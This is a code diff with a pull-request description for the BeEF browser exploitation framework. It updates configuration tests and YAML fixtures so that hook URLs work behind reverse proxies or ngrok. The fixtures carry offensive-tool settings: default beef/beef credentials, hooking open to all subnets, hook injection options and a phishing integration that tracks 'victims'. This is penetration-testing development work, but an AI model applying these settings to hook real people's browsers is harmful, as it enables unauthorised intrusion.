+      expect(@config_instance.get('beef.http.public.https')).to eq(nil)
       expect(@config_instance.beef_port).to eq('3000')
     end
 
@@ -195,16 +195,16 @@ RSpec.describe 'BeEF Configuration' do
     end
     
     it 'should return a protocol https if https public has been enabled and public host is set' do
-      @config_instance.set('beef.http.https.public_enabled', true)
+      @config_instance.set('beef.http.public.https', true)
       @config_instance.set('beef.http.public.host', 'public')
-      expect(@config_instance.get('beef.http.https.public_enabled')).to eq(true)
+      expect(@config_instance.get('beef.http.public.https')).to eq(true)
       expect(@config_instance.beef_proto).to eq('https')
     end
 
     it 'should return a protocol http if public is not set and https local is fales'  do
-      @config_instance.set('beef.http.https.public_enabled', false)
+      @config_instance.set('beef.http.public.https', false)
       @config_instance.set('beef.http.https.enabled', false)
-      expect(@config_instance.get('beef.http.https.public_enabled')).to eq(false)
+      expect(@config_instance.get('beef.http.public.https')).to eq(false)
       expect(@config_instance.beef_proto).to eq('http')
     end
 
@@ -212,13 +212,13 @@ RSpec.describe 'BeEF Configuration' do
       @config_instance.set('beef.http.host', 'localhost')
       @config_instance.set('beef.http.port', '80')
       @config_instance.set('beef.http.https.enabled', false)
-      @config_instance.set('beef.http.https.public_enabled', false)
+      @config_instance.set('beef.http.public.https', false)
       @config_instance.set('beef.http.public.host', nil)
       @config_instance.set('beef.http.public.port', nil)
       expect(@config_instance.get('beef.http.host')).to eq('localhost')
       expect(@config_instance.get('beef.http.port')).to eq('80')
       expect(@config_instance.get('beef.http.https.enabled')).to eq(false)
-      expect(@config_instance.get('beef.http.https.public_enabled')).to eq(false)
+      expect(@config_instance.get('beef.http.public.https')).to eq(false)
       expect(@config_instance.beef_url_str).to eq('http://localhost:80')
     end
 
@@ -227,13 +227,13 @@ RSpec.describe 'BeEF Configuration' do
       @config_instance.set('beef.http.port', nil)
       @config_instance.set('beef.http.https.enabled', true)
       @config_instance.set('beef.http.public.host', nil)
-      @config_instance.set('beef.http.https.public_enabled', false)
+      @config_instance.set('beef.http.public.https', false)
       @config_instance.set('beef.http.public.host', nil)
       @config_instance.set('beef.http.public.port', nil)
       expect(@config_instance.get('beef.http.host')).to eq('localhost')
       expect(@config_instance.get('beef.http.port')).to eq(nil)
       expect(@config_instance.get('beef.http.https.enabled')).to eq(true)
-      expect(@config_instance.get('beef.http.https.public_enabled')).to eq(false)
+      expect(@config_instance.get('beef.http.public.https')).to eq(false)
       expect(@config_instance.beef_url_str).to eq('https://localhost:3000')
     end
 
@@ -241,14 +241,14 @@ RSpec.describe 'BeEF Configuration' do
       @config_instance.set('beef.http.host', 'localhost')
       @config_instance.set('beef.http.port', nil)
       @config_instance.set('beef.http.https.enabled', true)
-      @config_instance.set('beef.http.https.public_enabled', false)
+      @config_instance.set('beef.http.public.https', false)
       @config_instance.set('beef.http.public.host', nil)
       @config_instance.set('beef.http.public.port', nil)
       @config_instance.set('beeg.http.hook_file', '/hook.js')
       expect(@config_instance.get('beef.http.host')).to eq('localhost')
       expect(@config_instance.get('beef.http.port')).to eq(nil)
       expect(@config_instance.get('beef.http.https.enabled')).to eq(true)
-      expect(@config_instance.get('beef.http.https.public_enabled')).to eq(false)
+      expect(@config_instance.get('beef.http.public.https')).to eq(false)
       expect(@config_instance.get('beef.http.hook_file')).to eq('/hook.js')
       expect(@config_instance.beef_url_str).to eq('https://localhost:3000')
       expect(@config_instance.hook_url).to eq('https://localhost:3000/hook.js')

--- a/spec/beef/core/main/configuration_spec.rb
+++ b/spec/beef/core/main/configuration_spec.rb
@@ -1,0 +1,235 @@
+RSpec.describe 'BeEF Configuration' do
+  before(:all) do
+    @config_instance = BeEF::Core::Configuration.instance
+  end
+  
+  context 'http local host configuration values' do
+    it 'should set the local host value to 0.0.0.0' do
+      @config_instance.set('beef.http.host', '0.0.0.0')
+      expect(@config_instance.get('beef.http.host')).to eq('0.0.0.0')
+    end
+
+    it 'should get the local host value' do
+      @config_instance.set('beef.http.host', '0.0.0.0')
+      expect(@config_instance.local_host).to eq('0.0.0.0')
+    end
+
+    it 'should get the default host value' do
+      @config_instance.set('beef.http.host', nil)
+      expect(@config_instance.get('beef.http.host')).to eq(nil)
+      expect(@config_instance.local_host).to eq('0.0.0.0')
+    end
+  end
+
+  context 'http local port configuration values' do
+    it 'should set the local port value to 3000' do
+      @config_instance.set('beef.http.port', '3000')
+      expect(@config_instance.get('beef.http.port')).to eq('3000')
+    end
+
+    it 'should get the local port value' do
+      @config_instance.set('beef.http.port', '3000')
+      expect(@config_instance.local_port).to eq('3000')
+    end
+
+    it 'should get the default port value' do
+      @config_instance.set('beef.http.port', nil)
+      expect(@config_instance.get('beef.http.port')).to eq(nil)
+      expect(@config_instance.local_port).to eq('3000')
+    end
+  end
+
+  context 'beef https enabled configuration values' do
+    it 'should set the https enabled config value' do
+      @config_instance.set('beef.http.https.enabled', true)
+      expect(@config_instance.get('beef.http.https.enabled')).to eq(true)
+    end
+
+    it 'should get https enabled value set to true' do
+      @config_instance.set('beef.http.https.enabled', true)
+      expect(@config_instance.local_https_enabled).to eq(true)
+    end
+
+    it 'should get https enabled value set to false' do
+      @config_instance.set('beef.http.https.enabled', false)
+      expect(@config_instance.local_https_enabled).to eq(false)
+    end
+
+    it 'should get the default https enabled value' do
+      @config_instance.set('beef.http.https.enabled', nil)
+      expect(@config_instance.get('beef.http.https.enabled')).to eq(nil)
+      expect(@config_instance.local_https_enabled).to eq(false)
+    end
+  end
+
+  #public
+  context 'http public host configuration values' do
+    it 'should set the public host value to example.com' do
+      @config_instance.set('beef.http.public', 'example.com')
+      expect(@config_instance.get('beef.http.public')).to eq('example.com')
+    end
+
+    it 'should get the public host value' do
+      @config_instance.set('beef.http.public', 'example.com')
+      expect(@config_instance.public_host).to eq('example.com')
+    end
+
+    it 'should get nil host value' do
+      @config_instance.set('beef.http.public', nil)
+      expect(@config_instance.get('beef.http.public')).to eq(nil)
+      expect(@config_instance.public_host).to eq(nil)
+    end
+  end
+
+  context 'http public port configuration values' do
+    it 'should set the public port value to 3000' do
+      @config_instance.set('beef.http.public_port', '443')
+      expect(@config_instance.get('beef.http.public_port')).to eq('443')
+    end
+
+    it 'should get the public port value' do
+      @config_instance.set('beef.http.public_port', '3000')
+      expect(@config_instance.public_port).to eq('3000')
+    end
+
+    it 'should return 80 as the port given a public host has been set and https disabled' do
+      @config_instance.set('beef.http.public_port', nil)
+      @config_instance.set('beef.http.public', 'example.com')
+      @config_instance.set('beef.http.https.public_enabled', false)
+      expect(@config_instance.get('beef.http.public_port')).to eq(nil)
+      expect(@config_instance.get('beef.http.public')).to eq('example.com')
+      expect(@config_instance.public_port).to eq('80')
+    end
+  end
+
+  context 'beef https enabled configuration values' do
+    it 'should set the https enabled config value' do
+      @config_instance.set('beef.http.https.enabled', true)
+      expect(@config_instance.get('beef.http.https.enabled')).to eq(true)
+    end
+
+    it 'should get https enabled value set to true' do
+      @config_instance.set('beef.http.https.public_enabled', true)
+      expect(@config_instance.public_https_enabled?).to eq(true)
+    end
+
+    it 'should get https enabled value set to false' do
+      @config_instance.set('beef.http.https.public_enabled', false)
+      expect(@config_instance.public_https_enabled?).to eq(false)
+    end
+
+    it 'should get the default https to false' do
+      @config_instance.set('beef.http.https.public_enabled', nil)
+      expect(@config_instance.get('beef.http.https.public_enabled')).to eq(nil)
+      expect(@config_instance.public_https_enabled?).to eq(false)
+    end
+
+    it 'should return public port as 443 if public https is enabled' do
+      @config_instance.set('beef.http.https.public_enabled', true)
+      @config_instance.set('beef.http.public_port', nil)
+      expect(@config_instance.get('beef.http.https.public_enabled')).to eq(true)
+      expect(@config_instance.get('beef.http.public_port')).to eq(nil)
+      expect(@config_instance.public_https_enabled?).to eq(true)
+      expect(@config_instance.public_port).to eq('443')
+    end
+  end
+
+  context 'beef hosting information' do
+    it 'should return the local host value because a public has not been set' do
+      @config_instance.set('beef.http.host', 'asdqwe')
+      @config_instance.set('beef.http.public', nil)
+      expect(@config_instance.get('beef.http.host')).to eq('asdqwe')
+      expect(@config_instance.get('beef.http.public')).to eq(nil)
+      expect(@config_instance.beef_host).to eq('asdqwe')
+    end
+
+    it 'should return the public host value because a public has been set' do
+      @config_instance.set('beef.http.host', 'asdqwe')
+      @config_instance.set('beef.http.public', 'poilkj')
+      expect(@config_instance.get('beef.http.host')).to eq('asdqwe')
+      expect(@config_instance.get('beef.http.public')).to eq('poilkj')
+      expect(@config_instance.beef_host).to eq('poilkj')
+    end
+
+    it 'should return the local port value because a public value has not been set' do
+      @config_instance.set('beef.http.port', '3000')
+      @config_instance.set('beef.http.public', nil)
+      @config_instance.set('beef.http.public_port', nil)
+      @config_instance.set('beef.http.https.public_enabled', nil)
+      expect(@config_instance.get('beef.http.port')).to eq('3000')
+      expect(@config_instance.get('beef.http.public_port')).to eq(nil)
+      expect(@config_instance.get('beef.http.public')).to eq(nil)
+      expect(@config_instance.get('beef.http.https.public_enabled')).to eq(nil)
+      expect(@config_instance.beef_port).to eq('3000')
+    end
+
+    it 'should return the public host value because a public has been set' do
+      @config_instance.set('beef.http.port', '3000')
+      @config_instance.set('beef.http.public_port', '80')
+      @config_instance.set('beef.http.public', nil)
+      expect(@config_instance.get('beef.http.port')).to eq('3000')
+      expect(@config_instance.get('beef.http.public_port')).to eq('80')
+      expect(@config_instance.get('beef.http.public')).to eq(nil)
+      expect(@config_instance.beef_port).to eq('80')
+    end
+    
+    it 'should return a protocol https if https public has been enabled and public host is set' do
+      @config_instance.set('beef.http.https.public_enabled', true)
+      @config_instance.set('beef.http.public', 'public')
+      expect(@config_instance.get('beef.http.https.public_enabled')).to eq(true)
+      expect(@config_instance.beef_proto).to eq('https')
+    end
+
+    it 'should return a protocol http if public is not set and https local is fales'  do
+      @config_instance.set('beef.http.https.public_enabled', false)
+      @config_instance.set('beef.http.https.enabled', false)
+      expect(@config_instance.get('beef.http.https.public_enabled')).to eq(false)
+      expect(@config_instance.beef_proto).to eq('http')
+    end
+
+    it 'should return the full url string for beef local http and port 80' do
+      @config_instance.set('beef.http.host', 'localhost')
+      @config_instance.set('beef.http.port', '80')
+      @config_instance.set('beef.http.https.enabled', false)
+      @config_instance.set('beef.http.https.public_enabled', false)
+      @config_instance.set('beef.http.public', nil)
+      @config_instance.set('beef.http.public_port', nil)
+      expect(@config_instance.get('beef.http.host')).to eq('localhost')
+      expect(@config_instance.get('beef.http.port')).to eq('80')
+      expect(@config_instance.get('beef.http.https.enabled')).to eq(false)
+      expect(@config_instance.get('beef.http.https.public_enabled')).to eq(false)
+      expect(@config_instance.beef_url_str).to eq('http://localhost:80')
+    end
+
+    it 'should return the full url string for beef https localhost 3000 default' do
+      @config_instance.set('beef.http.host', 'localhost')
+      @config_instance.set('beef.http.port', nil)
+      @config_instance.set('beef.http.https.enabled', true)
+      @config_instance.set('beef.http.https.public_enabled', false)
+      @config_instance.set('beef.http.public', nil)
+      @config_instance.set('beef.http.public_port', nil)
+      expect(@config_instance.get('beef.http.host')).to eq('localhost')
+      expect(@config_instance.get('beef.http.port')).to eq(nil)
+      expect(@config_instance.get('beef.http.https.enabled')).to eq(true)
+      expect(@config_instance.get('beef.http.https.public_enabled')).to eq(false)
+      expect(@config_instance.beef_url_str).to eq('https://localhost:3000')
+    end
+
+    it 'should return the full url string for beef hook url' do
+      @config_instance.set('beef.http.host', 'localhost')
+      @config_instance.set('beef.http.port', nil)
+      @config_instance.set('beef.http.https.enabled', true)
+      @config_instance.set('beef.http.https.public_enabled', false)
+      @config_instance.set('beef.http.public', nil)
+      @config_instance.set('beef.http.public_port', nil)
+      @config_instance.set('beeg.http.hook_file', '/hook.js')
+      expect(@config_instance.get('beef.http.host')).to eq('localhost')
+      expect(@config_instance.get('beef.http.port')).to eq(nil)
+      expect(@config_instance.get('beef.http.https.enabled')).to eq(true)
+      expect(@config_instance.get('beef.http.https.public_enabled')).to eq(false)
+      expect(@config_instance.get('beef.http.hook_file')).to eq('/hook.js')
+      expect(@config_instance.beef_url_str).to eq('https://localhost:3000')
+      expect(@config_instance.hook_url).to eq('https://localhost:3000/hook.js')
+    end
+  end
+end

--- a/spec/support/assets/config_new.yaml
+++ b/spec/support/assets/config_new.yaml
@@ -1,0 +1,162 @@
+#
+# Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# BeEF Configuration file
+
+beef:
+    version: '0.5.1.0'
+    # More verbose messages (server-side)
+    debug: false
+    # More verbose messages (client-side)
+    client_debug: false
+    # Used for generating secure tokens
+    crypto_default_value_length: 80
+
+    # Credentials to authenticate in BeEF.
+    # Used by both the RESTful API and the Admin interface
+    credentials:
+        user:   "beef"
+        passwd: "beef"
+
+    # Interface / IP restrictions
+    restrictions:
+        # subnet of IP addresses that can hook to the framework
+        permitted_hooking_subnet: ["0.0.0.0/0", "::/0"]
+        # subnet of IP addresses that can connect to the admin UI
+        #permitted_ui_subnet: ["127.0.0.1/32", "::1/128"]
+        permitted_ui_subnet: ["0.0.0.0/0", "::/0"]
+        # subnet of IP addresses that cannot be hooked by the framework
+        excluded_hooking_subnet: []
+        # slow API calls to 1 every  api_attempt_delay  seconds
+        api_attempt_delay: "0.05"
+
+    # HTTP server
+    http:
+        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
+        host: "0.0.0.0"
+        port: "3000"
+
+        # Decrease this setting to 1,000 (ms) if you want more responsiveness
+        #  when sending modules and retrieving results.
+        # NOTE: A poll timeout of less than 5,000 (ms) might impact performance
+        #  when hooking lots of browsers (50+).
+        # Enabling WebSockets is generally better (beef.websocket.enable)
+        xhr_poll_timeout: 1000
+
+        # Host Name / Domain Name
+        # If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
+        #   set the public hostname below:
+        #public: ""      # public hostname/IP address
+
+        # Reverse Proxy / NAT
+        # If you want BeEF to be accessible behind a reverse proxy or NAT,
+        #   set both the publicly accessible hostname/IP address and port below:
+        # NOTE: Allowing the reverse proxy will enable a vulnerability where the ui/panel can be spoofed
+        #   by altering the X-FORWARDED-FOR ip address in the request header.
+        allow_reverse_proxy: false
+        
+        # Public settings
+        # These settings will be used to create a public facing URL
+        # This public facing URL will be used for all hook related calls
+        public:
+            host: "example.com"
+            port: 443
+            https: true # public hostname/IP address
+        #public_port: "" # public port (experimental)
+
+        # Hook
+        hook_file: "/hook.js"
+        hook_session_name: "BEEFHOOK"
+
+        # Allow one or multiple origins to access the RESTful API using CORS
+        # For multiple origins use: "http://browserhacker.com, http://domain2.com"
+        restful_api:
+            allow_cors: false
+            cors_allowed_domains: "http://browserhacker.com"
+
+        # Prefer WebSockets over XHR-polling when possible.
+        websocket:
+            enable: false
+            port: 61985 # WS: good success rate through proxies
+            # Use encrypted 'WebSocketSecure'
+            # NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
+            secure: true
+            secure_port: 61986 # WSSecure
+            ws_poll_timeout: 5000 # poll BeEF every x second, this affects how often the browser can have a command execute on it
+            ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel
+
+        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
+        web_server_imitation:
+            enable: true
+            type: "apache" # Supported: apache, iis, nginx
+            hook_404: false # inject BeEF hook in HTTP 404 responses
+            hook_root: false # inject BeEF hook in the server home page
+        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
+        https:
+            enable: false
+            # Enabled this config setting if you're external facing uri is using https
+            public_enabled: false
+            # In production environments, be sure to use a valid certificate signed for the value
+            # used in beef.http.public (the domain name of the server where you run BeEF)
+            key: "beef_key.pem"
+            cert: "beef_cert.pem"
+
+    database:
+        file: "beef.db"
+
+    # Autorun Rule Engine
+    autorun:
+        # this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
+        # to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
+        # continue execution regardless of results.
+        # If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
+        result_poll_interval: 300
+        result_poll_timeout: 5000
+
+        # If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
+        # This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
+        continue_after_timeout: true
+
+    # Enables DNS lookups on zombie IP addresses
+    dns_hostname_lookup: false
+
+    # IP Geolocation
+    # NOTE: requires MaxMind database. Run ./updated-geoipdb to install.
+    geoip:
+        enable: true
+        database: '/opt/GeoIP/GeoLite2-City.mmdb'
+
+    # Integration with PhishingFrenzy
+    # If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
+    # to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
+    integration:
+        phishing_frenzy:
+            enable: false
+
+    # You may override default extension configuration parameters here
+    # Note: additional experimental extensions are available in the 'extensions' directory
+    #       and can be enabled via their respective 'config.yaml' file
+    extension:
+        admin_ui:
+            enable: true
+            base_path: "/ui"
+        demos:
+            enable: true
+        events:
+            enable: true
+        evasion:
+            enable: false
+        requester:
+            enable: true
+        proxy:
+            enable: true
+        network:
+            enable: true
+        metasploit:
+            enable: false
+        social_engineering:
+            enable: true
+        xssrays:
+            enable: true

--- a/spec/support/assets/config_old.yaml
+++ b/spec/support/assets/config_old.yaml
@@ -1,0 +1,155 @@
+#
+# Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# BeEF Configuration file
+
+beef:
+    version: '0.5.1.0'
+    # More verbose messages (server-side)
+    debug: false
+    # More verbose messages (client-side)
+    client_debug: false
+    # Used for generating secure tokens
+    crypto_default_value_length: 80
+
+    # Credentials to authenticate in BeEF.
+    # Used by both the RESTful API and the Admin interface
+    credentials:
+        user:   "beef"
+        passwd: "beef"
+
+    # Interface / IP restrictions
+    restrictions:
+        # subnet of IP addresses that can hook to the framework
+        permitted_hooking_subnet: ["0.0.0.0/0", "::/0"]
+        # subnet of IP addresses that can connect to the admin UI
+        #permitted_ui_subnet: ["127.0.0.1/32", "::1/128"]
+        permitted_ui_subnet: ["0.0.0.0/0", "::/0"]
+        # subnet of IP addresses that cannot be hooked by the framework
+        excluded_hooking_subnet: []
+        # slow API calls to 1 every  api_attempt_delay  seconds
+        api_attempt_delay: "0.05"
+
+    # HTTP server
+    http:
+        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
+        host: "0.0.0.0"
+        port: "3000"
+
+        # Decrease this setting to 1,000 (ms) if you want more responsiveness
+        #  when sending modules and retrieving results.
+        # NOTE: A poll timeout of less than 5,000 (ms) might impact performance
+        #  when hooking lots of browsers (50+).
+        # Enabling WebSockets is generally better (beef.websocket.enable)
+        xhr_poll_timeout: 1000
+
+        # Host Name / Domain Name
+        # If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
+        #   set the public hostname below:
+        #public: ""      # public hostname/IP address
+
+        # Reverse Proxy / NAT
+        # If you want BeEF to be accessible behind a reverse proxy or NAT,
+        #   set both the publicly accessible hostname/IP address and port below:
+        # NOTE: Allowing the reverse proxy will enable a vulnerability where the ui/panel can be spoofed
+        #   by altering the X-FORWARDED-FOR ip address in the request header.
+        allow_reverse_proxy: false
+        public: "example" # public hostname/IP address
+        #public_port: "" # public port (experimental)
+
+        # Hook
+        hook_file: "/hook.js"
+        hook_session_name: "BEEFHOOK"
+
+        # Allow one or multiple origins to access the RESTful API using CORS
+        # For multiple origins use: "http://browserhacker.com, http://domain2.com"
+        restful_api:
+            allow_cors: false
+            cors_allowed_domains: "http://browserhacker.com"
+
+        # Prefer WebSockets over XHR-polling when possible.
+        websocket:
+            enable: false
+            port: 61985 # WS: good success rate through proxies
+            # Use encrypted 'WebSocketSecure'
+            # NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
+            secure: true
+            secure_port: 61986 # WSSecure
+            ws_poll_timeout: 5000 # poll BeEF every x second, this affects how often the browser can have a command execute on it
+            ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel
+
+        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
+        web_server_imitation:
+            enable: true
+            type: "apache" # Supported: apache, iis, nginx
+            hook_404: false # inject BeEF hook in HTTP 404 responses
+            hook_root: false # inject BeEF hook in the server home page
+        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
+        https:
+            enable: false
+            # Enabled this config setting if you're external facing uri is using https
+            public_enabled: false
+            # In production environments, be sure to use a valid certificate signed for the value
+            # used in beef.http.public (the domain name of the server where you run BeEF)
+            key: "beef_key.pem"
+            cert: "beef_cert.pem"
+
+    database:
+        file: "beef.db"
+
+    # Autorun Rule Engine
+    autorun:
+        # this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
+        # to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
+        # continue execution regardless of results.
+        # If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
+        result_poll_interval: 300
+        result_poll_timeout: 5000
+
+        # If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
+        # This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
+        continue_after_timeout: true
+
+    # Enables DNS lookups on zombie IP addresses
+    dns_hostname_lookup: false
+
+    # IP Geolocation
+    # NOTE: requires MaxMind database. Run ./updated-geoipdb to install.
+    geoip:
+        enable: true
+        database: '/opt/GeoIP/GeoLite2-City.mmdb'
+
+    # Integration with PhishingFrenzy
+    # If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
+    # to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
+    integration:
+        phishing_frenzy:
+            enable: false
+
+    # You may override default extension configuration parameters here
+    # Note: additional experimental extensions are available in the 'extensions' directory
+    #       and can be enabled via their respective 'config.yaml' file
+    extension:
+        admin_ui:
+            enable: true
+            base_path: "/ui"
+        demos:
+            enable: true
+        events:
+            enable: true
+        evasion:
+            enable: false
+        requester:
+            enable: true
+        proxy:
+            enable: true
+        network:
+            enable: true
+        metasploit:
+            enable: false
+        social_engineering:
+            enable: true
+        xssrays:
+            enable: true

--- a/spec/support/assets/config_old.yaml
+++ b/spec/support/assets/config_old.yaml
@@ -56,7 +56,7 @@ beef:
         # NOTE: Allowing the reverse proxy will enable a vulnerability where the ui/panel can be spoofed
         #   by altering the X-FORWARDED-FOR ip address in the request header.
         allow_reverse_proxy: false
-        public: "example" # public hostname/IP address
+        #public: "example" # public hostname/IP address
         #public_port: "" # public port (experimental)
 
         # Hook


### PR DESCRIPTION
## Category
Bug: Core

## Feature/Issue Description

As mentioned in #1785 there is currently a bug that prevents BeEF from hooking browsers when the BeEF hook (public) URL is different from the BeEF host (local) URL ((ie, behind a reverse proxy, or when used via services such as ngrok, or when using port forwarding from a border gateway)

To resolve this issue the PR completely decouples the local host settings from the public settings.
This means that if a user sets anything in the public section within the configuration.

```YAM
        # If BeEF is running behind a reverse proxy or NAT
        #  set the public hostname and port here & protocol
        public:
            host: "example.com"
            port: "3000"
            https: true/false
```

It will automatically use these values when referencing the hook (public) URL.
These values can be seen in the Configuration object used through the application.

### Beef Host
```Ruby
      #
       # Returns the beef host which is used by external resources
       # e.g. hooked browsers
       def beef_host
         public_host || local_host
       end
```
### Beef Port
```Ruby
      #
       # Returns the beef port which is used by external resource
       # e.g. hooked browsers
       def beef_port
         public_port || local_port
       end
```

### Beef protocol (http/https)
```Ruby
#
       # Returns the beef protocol that is used by external resources
       # e.g. hooked browsers
       def beef_proto
         if public_enabled? && public_https_enabled? then
           return 'https'
         elsif public_enabled? && !public_https_enabled?
           return 'http'
         elsif !public_enabled?
           return local_proto
         end
       end
```

A contributor can now new some new configuration values that will reference the full hooking url

```Ruby
      # Returns the url to the hook file
       #
       # @return [String] the url string
       def hook_url
         "#{beef_url_str}#{hook_file_path}"
       end
```

These new configuration getters can be used through the code base reducing the code repetition found through the code base

```Ruby    
     @configuration = BeEF::Core::Configuration.instance
     beef_proto = @configuration.get("beef.http.https.enable") == true ? "https" : "http";
     beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
     beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
     beef_hook = @configuration.get("beef.http.hook_file")
     hook_url = "#{beef_proto}://#{beef_host}:#{beef_port}/#{beef_hook}"
```

Can now simply be the following

```Ruby
    @config.hook_url
```

The most common issue that would be raised due to this bug was when a users was trying to implement ngrok.
Ngrok would use the https protocol and if the user did not setup the beef local host using https it would cause mixed content errors preventing browser hooking.

With the net configuration items, the user can now have a https proxy that redirects to a http local host please see the new setup instructions for ngrok [here](https://github.com/beefproject/beef/wiki/FAQ#how-do-i-configure-beef-with-ngrok)

## Test Cases

Tests have been developed in the specs area. spec/beef/core/main/configuration_spec.rb
These will need to be improved as they set and retrieve within the scope.
They should in theory only read config files that have been pre-populated with the testing scenarios

## Wiki Page

https://github.com/beefproject/beef/wiki/Configuration#web-server-configuration has been updated below
https://github.com/beefproject/beef/wiki/FAQ#how-do-i-configure-beef-with-ngrok


